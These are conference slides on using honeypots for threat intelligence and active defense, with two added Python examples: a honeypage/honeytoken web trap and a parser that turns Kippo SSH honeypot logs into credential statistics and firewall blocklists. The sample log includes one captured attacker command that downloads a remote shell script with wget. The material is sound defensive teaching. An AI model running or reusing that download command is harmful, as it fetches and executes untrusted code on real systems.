Post on 27-May-2015
Threat Intelligence from Honeypots for Active Defense
Today’s Presenters
Ioannis Koniaris, Information Security Engineer and Researcher
Ken Westin, Security Researcher, Tripwire
If you know your enemies and know yourself, you will not be imperiled in a hundred battles.
— Sun Tzu, The Art of War
Know Yourself: Vulnerability Centered
• Strong focus on prevention
• Signature based detection
• Business context of assets
• Threats are viewed equally without context
• Minimal ability to detect unknown threats
Know Your Enemies: Threat Centered
• Understands that prevention fails (eventually)
• Focus on collection and observation
• Every attack makes you stronger
• Understands that different threats use different TTPs (Tactics, Techniques & Procedures)
• Leverages a wide range of data sources
• Detection based on more than signatures

Threat actors: APT, Script Kiddie, Hacktivist, Criminal Syndicate, Bots
Space I can recover. Time, never.
— Napoleon Bonaparte
Hacking is a Business Too: Reduce Their ROI
Hacking Back: Proactive Intelligence with Honeypots for Active Defense
Ioannis Koniaris, GCIH, GSNA, eCPPT, eMAPT
About me
● Started studying honeypots for academic purposes (thesis, IEEE papers)
● Member of the Honeynet Project (non-profit)
● Maintainer of BruteForce Lab (http://bruteforce.gr) → open source honeypot projects for ~3 years
● Tools: HoneyDrive, Kippo-Graph, Honeyd-Viz, various other tools and contributions
● Always interested in collaboration for new tools and research!
Introduction to honeypots
● Definition: “An information system resource whose value lies in unauthorized or illicit use of that resource” (Lance Spitzner)
● It’s a system with no production value
● There is no reason for a legitimate user to use it or interact with it
Introduction to honeypots
● Any communication attempt is automatically considered malicious
● A honeypot that tries to connect to another system is probably compromised
● They are both deceit tools and traps
● Attackers waste time while their actions are monitored closely
Introduction to honeypots
● They cannot prevent attacks against the network by themselves
● But they can help in the detection phase of an attack and reveal the exploitation methods used
● They can be used in conjunction with firewalls and IDSes, and in fact support them really nicely as they “patch” their weaknesses
Emulation of OSes and Services
● OS emulation is done using “fingerprints”
● 8 parameters of the TCP/IP stack are not fixed – 67 bit signature
● The same way that various tools identify the remote OS, e.g. nmap, p0f, etc
● Service emulation is done using scripts with identical behavior and output as the real services
Honeypot classifications
● Honeypots can be divided into categories based on two criteria:
  o The purpose of honeypot deployment
  o The level of allowed interaction with the honeypot
● Honeypot categories based on purpose:
  o Production honeypots
  o Research honeypots
Honeypot classifications
● Production honeypots are placed alongside the real systems of a business, acting as decoys
● Ideally they are mirrors of real servers where attackers will waste their time while we are gathering intelligence
● Research honeypots monitor attack activities and capture malicious traffic and files to enhance our knowledge of attack vectors
Honeypot classifications
● Honeypot categories based on the level of allowed interaction:
  o Low-interaction honeypots
  o Medium-interaction honeypots
  o High-interaction honeypots
● Low-interaction honeypots offer little to no interaction between the server and the attacker
● It’s only software emulating one or more services – low added risk but limited data
Honeypot classifications
● Medium-interaction honeypots offer greater interaction between the system and the attacker
● The emulated network services respond to the attacker and allow access to fake resources (e.g. a fake FTP server)
● Can be used to catch malware as well by emulating specific vulnerabilities in a service
● Medium added risk but generally good results and data!
Honeypot classifications
● High-interaction honeypots are real vulnerable OSes given to attackers as sacrificial lambs
● Intruders will have real access and control of the system
● Usually used to capture attacks against specific services or targets fitting a specific profile
● High risk and high reward!
● Greatest level of data capture, BUT they must be isolated and monitored at all times! (pivoting)
Honeypot placement & operation
● Mainly 3 common honeypot placement spots:
  o Externally, in front of the firewall, facing the Internet
  o Internally, behind the firewall
  o Demilitarized Zone (DMZ)
● External placement is used to immediately make them available to attackers for intrusion and takeover (most suitable for research honeypots)
Honeypot placement & operation
● Internal placement is most suitable to detect attackers (human or software) that have breached the perimeter
● Effective early warning system
● High added risk to the network if using a high-interaction honeypot and it gets taken over – egress firewall needed
Honeypot placement & operation
● DMZ placement is the best choice for a business/organization
● Honeypots and other DMZ hosts share the same subnet
● Can be setup as mirrors of real systems in order to catch early attacks against the DMZ
Other honeypot technologies
● Honeytokens are objects with no production value placed in a system as an intrusion detection mechanism
● Various small electronic baits that no legitimate user should access – e.g. fake admin account user/pass combination
● If a honeytoken is found in the application’s logs, the system has been compromised
Other honeypot technologies
● Honeypages are fake web pages inside a real web app, with no production value
● There is no direct link to them, so every request is considered malicious
● A request can come from automated scanning, robots.txt analysis, etc – honeypages log every piece of information they can get
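The honeytoken (a fake admin account no legitimate user holds) and honeypage (an unlinked page that scanners only discover through robots.txt) ideas from the two slides above, combined in one self-contained WSGI app. This is an added example and not code from the presentation or from any tool it lists; the honeypage path /admin-backup/, the planted account name svc_backup, and the in-memory ALERTS list standing in for a SIEM are assumptions made for the example.

```python
"""Added example, not code from the presentation or any of the tools it lists:
a minimal WSGI deception layer that combines a honeypage with a honeytoken.
The honeypage path, the planted account name and the alert record layout are
all assumptions made for this example."""
import io
import time
from urllib.parse import parse_qs

# Honeypage: never linked from the real site, only "advertised" via robots.txt,
# so a hit means someone parsed robots.txt or brute-forced paths.
HONEYPAGE = "/admin-backup/"                     # assumption
ROBOTS_TXT = f"User-agent: *\nDisallow: {HONEYPAGE}\n"

# Honeytoken: a fake admin account that no legitimate user has. It would be
# planted somewhere an intruder reads (a config file, a wiki page); a login
# attempt with it is a compromise indicator, not a user error.
HONEYTOKEN_USER = "svc_backup"                   # assumption

ALERTS = []   # stand-in for shipping events to a SIEM; in memory so this runs offline


def record_alert(kind, environ, **extra):
    """Log everything the request gives us: source, UA, path, query, plus extras."""
    event = {
        "time": time.time(),
        "kind": kind,
        "src": environ.get("REMOTE_ADDR", ""),
        "user_agent": environ.get("HTTP_USER_AGENT", ""),
        "path": environ.get("PATH_INFO", ""),
        "query": environ.get("QUERY_STRING", ""),
    }
    event.update(extra)
    ALERTS.append(event)
    return event


def app(environ, start_response):
    path = environ.get("PATH_INFO", "/")
    method = environ.get("REQUEST_METHOD", "GET")

    if path == "/robots.txt":
        start_response("200 OK", [("Content-Type", "text/plain")])
        return [ROBOTS_TXT.encode()]

    if path.startswith(HONEYPAGE):
        record_alert("honeypage", environ)
        # Serve a plausible decoy so the scanner keeps going and keeps logging.
        start_response("200 OK", [("Content-Type", "text/html")])
        return [b"<html><body><h1>Backup console</h1><form method=post action=/login>"
                b"<input name=username><input name=password type=password></form></body></html>"]

    if path == "/login" and method == "POST":
        length = int(environ.get("CONTENT_LENGTH") or 0)
        form = parse_qs(environ["wsgi.input"].read(length).decode("utf-8", "replace"))
        username = form.get("username", [""])[0]
        if username == HONEYTOKEN_USER:
            # The password is irrelevant: nobody should know this account exists.
            record_alert("honeytoken", environ, username=username)
        # This example has no real accounts, so every login is rejected;
        # a real app would hand non-honeytoken users to its normal auth path.
        start_response("401 Unauthorized", [("Content-Type", "text/plain")])
        return [b"invalid credentials"]

    start_response("404 Not Found", [("Content-Type", "text/plain")])
    return [b"not found"]


def simulate(path, method="GET", body=b"", src="203.0.113.9", user_agent="scanner/1.0"):
    """Drive the app exactly as a WSGI server would, but without a network.
    Returns (status, body) so results can be checked programmatically."""
    environ = {
        "REQUEST_METHOD": method,
        "PATH_INFO": path,
        "QUERY_STRING": "",
        "REMOTE_ADDR": src,
        "HTTP_USER_AGENT": user_agent,
        "CONTENT_LENGTH": str(len(body)),
        "wsgi.input": io.BytesIO(body),
    }
    status = []
    body_out = b"".join(app(environ, lambda s, h: status.append(s)))
    return status[0], body_out


if __name__ == "__main__":
    # A scanner reads robots.txt, follows the disallowed path, then tries the planted account.
    simulate("/robots.txt")
    simulate(HONEYPAGE, user_agent="masscan/1.0")
    simulate("/login", "POST", b"username=svc_backup&password=guess")
    for a in ALERTS:
        print(a["kind"], a["src"], a["user_agent"], a["path"])
```

The two signals differ in confidence: a honeypage hit tells you a scanner is enumerating the site, while a honeytoken login tells you someone has already read a file they should never have reached, which is why the second is logged with the account name and should page someone rather than just be counted.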
Other honeypot technologies
● Attackers nowadays target client programs (browsers, media players, file viewers, etc)
● A client honeypot actively tries to find malicious websites serving exploits targeting client applications
● They usually use HTTP and emulate various web technologies like JavaScript, ActiveX, etc, acting like a browser
● Thug: modern Python honeyclient (Thug-Vagrant)
The value of honeypots
● They give almost no false positives
  o Honeypots have no production value and any interaction can be automatically considered malicious and a candidate for further analysis
● They help us detect malicious actions early on
  o Sysadmins can use them to quickly classify the nature and severity of attacks
The value of honeypots
● New and unknown attacks can be logged and identified as malicious as fast as common attacks
  o Tools like Honeycomb can create IDS rules
  o Files or content generated by attackers (e.g. IRC logs) are saved for further analysis
● Add an extra layer of protection, for example when they are placed internally in order to catch insider threats or warn sysadmins of malware
Honeypot advantages
● Simplicity of their idea
● They provide a small amount of captured data of high value
● Low requirements in terms of hardware
● Can be effective in encrypted environments (where IDSes might have problems) or IPv6 networks
Honeypot disadvantages
● No real value if nobody attacks them!
● Limited attack detection radius/scope
● Compromised high-interaction honeypots can be used as platforms to launch further attacks (pivots)
● Honeypots can sometimes taunt attackers
● Bugs or vulnerabilities can exist in the honeypots themselves
● Placing honeypots increases the overall complexity of a network – not good from a security standpoint
Legal issues
● Disclaimer: IANAL
● Different legislations across the world, different laws concerning the acquisition and storage of data
● No definite answer can be given, even though all top honeypot researchers agree that we are on the safe side!
Legal issues
● Privacy:
  o Essentially the question: “how much data can an admin gather and store before a privacy problem arises?”
  o Is it legal for an admin to capture data from other company employees? What about external threats in general?
Legal issues
● Privacy (cont.):
  o According to Lance Spitzner: The people breaking into these systems are NOT AUTHORIZED to use them, and if they place any files on them, they have given up their privacy rights to that data
Legal issues
● Privacy (cont.):
  o By using honeypots for communication, malicious actors have given up their right to privacy, as honeypots are not service providers and are not bound by privacy requirements designed for service providers
Legal issues
● Entrapment: A person is ‘entrapped’ when he is induced or persuaded by law enforcement officers or their agents to commit a crime that he had no previous intent to commit
  o Setting up honeypots cannot be considered an entrapment activity because honeypots do not induce or persuade anyone, nor promote malicious activity by themselves; attackers find and attack them on their own
Legal issues
● Liability:
  o Hypothetical scenario: a honeypot of company X is compromised by an attacker and is used as the source of attacks against the network of company Y. Who’s to blame???
  o No definite answer in this case, BUT we should also have mitigated this risk in the first place! (firewalls, egress filtering, etc)
Threat Intelligence gathering
● The Honeynet Project (in cooperation with the University of Aachen) published the first “public” live map of attacks: http://map.honeynet.org
Threat Intelligence gathering
● HoneyDrive: a self-contained Honeypot Linux distribution: http://bruteforce.gr/honeydrive
● It contains more than 10 honeypot systems preinstalled and preconfigured to work out of the box, plus ~90 other tools
● Some honeypots can be cumbersome to install and configure properly
● Created mainly to be a straightforward medium to quickly test and deploy different honeypots
Threat Intelligence: SSH attacks
● Kippo SSH honeypot: https://github.com/desaster/kippo
● Medium interaction, written in Python (Twisted)
● Logs entire shell sessions (UML compatible)
● Stores all files downloaded by attackers
● Emulates a Debian OS
● You can add fake files and content
● You can add fake command output
Threat Intelligence: SSH attacks
● Kippo-Graph is a visualization tool for Kippo: http://bruteforce.gr/kippo-graph
Threat Intelligence: SSH attacks
● Kippo fork with ElasticSearch support: https://github.com/ikoniaris/kippo
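What "threat intelligence from SSH attacks" looks like once Kippo's text log is parsed, as an added example that is not code from the presentation, Kippo, Kippo-Graph or the ElasticSearch fork: the script extracts login attempts, reports the most-guessed credentials and loudest sources, and turns the result into a blocklist for the active-defense step. The log lines are constructed for this example in the layout Kippo writes (timestamp, Twisted service tag carrying the peer address, then "login attempt [user/password] failed|succeeded"); treat that exact layout, the threshold of 3 and the iptables rendering as assumptions to check against your own kippo.log.

```python
"""Added example, not code from the presentation, Kippo or Kippo-Graph:
turn Kippo-style SSH honeypot log lines into threat intelligence (top
credentials, noisiest sources, which sessions got in) and a blocklist for
active defense. The sample lines are constructed in the layout Kippo writes;
treat that exact layout as an assumption to verify against a real kippo.log."""
import re
from collections import Counter
from dataclasses import dataclass
from ipaddress import ip_address

# Constructed sample lines (RFC 5737 documentation addresses, not real captures).
# The last line is deliberately malformed to exercise the address validation.
SAMPLE_LOG = """\
2015-05-27 10:00:01+0000 [SSHService ssh-userauth on HoneyPotTransport,0,203.0.113.5] login attempt [root/123456] failed
2015-05-27 10:00:02+0000 [SSHService ssh-userauth on HoneyPotTransport,0,203.0.113.5] login attempt [root/password] failed
2015-05-27 10:00:03+0000 [SSHService ssh-userauth on HoneyPotTransport,0,203.0.113.5] login attempt [root/toor] failed
2015-05-27 10:00:04+0000 [SSHService ssh-userauth on HoneyPotTransport,0,203.0.113.5] login attempt [admin/admin] failed
2015-05-27 10:05:10+0000 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.7] login attempt [root/123456] succeeded
2015-05-27 10:05:11+0000 [HoneyPotProtocol,1,198.51.100.7] CMD: wget http://198.51.100.9/x.sh
2015-05-27 10:09:00+0000 [SSHService ssh-userauth on HoneyPotTransport,2,192.0.2.33] login attempt [ubuntu/ubuntu] failed
2015-05-27 10:09:30+0000 [SSHService ssh-userauth on HoneyPotTransport,3,not-an-ip] login attempt [root/x] failed
"""

LOGIN_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[SSHService ssh-userauth on HoneyPotTransport,\d+,(?P<ip>[^\]]+)\] "
    r"login attempt \[(?P<user>[^/]*)/(?P<pw>.*)\] (?P<result>failed|succeeded)$"
)


@dataclass(frozen=True)
class LoginAttempt:
    ts: str
    ip: str
    user: str
    password: str
    succeeded: bool


def parse_login_attempts(log_text):
    """Extract login attempts; session/command lines are skipped. Lines whose peer
    address is not a valid IP are dropped because that field later feeds firewall rules."""
    attempts = []
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if not m:
            continue
        try:
            ip_address(m["ip"])
        except ValueError:
            continue
        attempts.append(LoginAttempt(m["ts"], m["ip"], m["user"], m["pw"],
                                     m["result"] == "succeeded"))
    return attempts


def summarize(attempts, top=5):
    """Intelligence that matters to you: which credentials are being guessed (is any
    of them valid on a real host?), who is loudest, and which sources got a shell."""
    creds = Counter((a.user, a.password) for a in attempts)
    sources = Counter(a.ip for a in attempts)
    return {
        "top_credentials": creds.most_common(top),
        "top_sources": sources.most_common(top),
        "successful_sources": sorted({a.ip for a in attempts if a.succeeded}),
    }


def blocklist(attempts, threshold=3):
    """Active-defense step: sources to drop at the perimeter. Any touch of a honeypot
    is suspect, but a threshold keeps one stray probe from costing a firewall rule;
    a successful login always qualifies."""
    hits = Counter(a.ip for a in attempts)
    got_in = {a.ip for a in attempts if a.succeeded}
    return sorted(ip for ip, n in hits.items() if n >= threshold or ip in got_in)


def iptables_rules(ips):
    """Render the blocklist as commands (addresses were validated at parse time)."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in ips]


if __name__ == "__main__":
    found = parse_login_attempts(SAMPLE_LOG)
    for key, value in summarize(found).items():
        print(key, value)
    print("\n".join(iptables_rules(blocklist(found))))
```

The validation step is the part worth copying: a honeypot's log is attacker-controlled input, and anything that flows from it into a firewall ruleset or a SIEM query should be checked for shape before it is used.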
Threat Intelligence: malware attacks
● Dionaea is a malware honeypot: http://dionaea.carnivore.it/
● The successor of Nepenthes
● Written in C/Python, emulates protocols
● SMB, HTTP(S), (T)FTP, MSSQL, MySQL, SIP
● Uses libemu to detect and analyze shellcodes
● Shellcode runs inside a libemu VM and API calls get recorded
Threat Intelligence: malware attacks
● DionaeaFR is a front end for Dionaea: http://rubenespadas.github.io/DionaeaFR/
Threat Intelligence: web attacks
● Glastopf is a web honeypot that emulates vulnerability “types” (covering thousands of individual vulnerabilities) to catch web attacks, rather than emulating each vulnerability separately: http://glastopf.org/
● Wordpot is a WordPress honeypot: http://brindi.si/g/projects/wordpot.html
Threat Intelligence: SCADA attacks
● Conpot is an ICS honeypot to collect intelligence about the motives and methods of adversaries targeting industrial control systems: http://conpot.org/
● Modbus emulation and specific widely used SCADA devices
● HMIs and new devices can be added by interested parties
Threat Intelligence: network sim
● Honeyd creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and have a “personality”: http://www.honeyd.org/
● Can emulate entire network/system topologies
● Honeyd2MySQL transfers honeyd logs to a MySQL DB: http://bruteforce.gr/honeyd2mysql
● Honeyd-Viz is a visualization tool for Honeyd: http://bruteforce.gr/honeyd-viz
Threat Intelligence: active defence
● ADHD is a distro containing various active defense tools: http://sourceforge.net/projects/adhd/
● It contains tools like:
  o Artillery and Bear Trap for blacklisting attackers
  o Decloak and Honey Badger to unmask attackers
  o Spidertrap and Weblabyrinth to trap malicious web scanners in endless loops
Threat Intelligence: active IDS
● Beeswarm is an active IDS project: https://github.com/honeynet/beeswarm
● It provides easy configuration, deployment and management of honeypots and clients
● The system lures attackers into the honeypots by setting up drones that communicate with the honeypots and intentionally leak credentials (honeytokens)
Threat Intelligence: other tools
● Modern Honey Network is a solution for managing and deploying common honeypot sensors: http://threatstream.github.io/mhn/
● Combine gathers threat intel from public feeds: https://github.com/mlsecproject/combine
● ArcReactor monitors public sources for OSINT data and sends them to a SIEM: http://deadbits.org/projects/arcreactor/
Conclusions
● Honeypots still present a unique concept
● They are more useful than ever in the current landscape of global attacks
● Tools and utilities exist to easily deploy sensors and gather intelligence that matters to *you*
● Much activity in the field by organizations (e.g. Honeynet Project) and individual researchers
● Give them a try!
Contact me
● BruteForce Lab: http://bruteforce.gr
● Email: ikoniaris@gmail.com
● Twitter: @ikoniaris
Thank you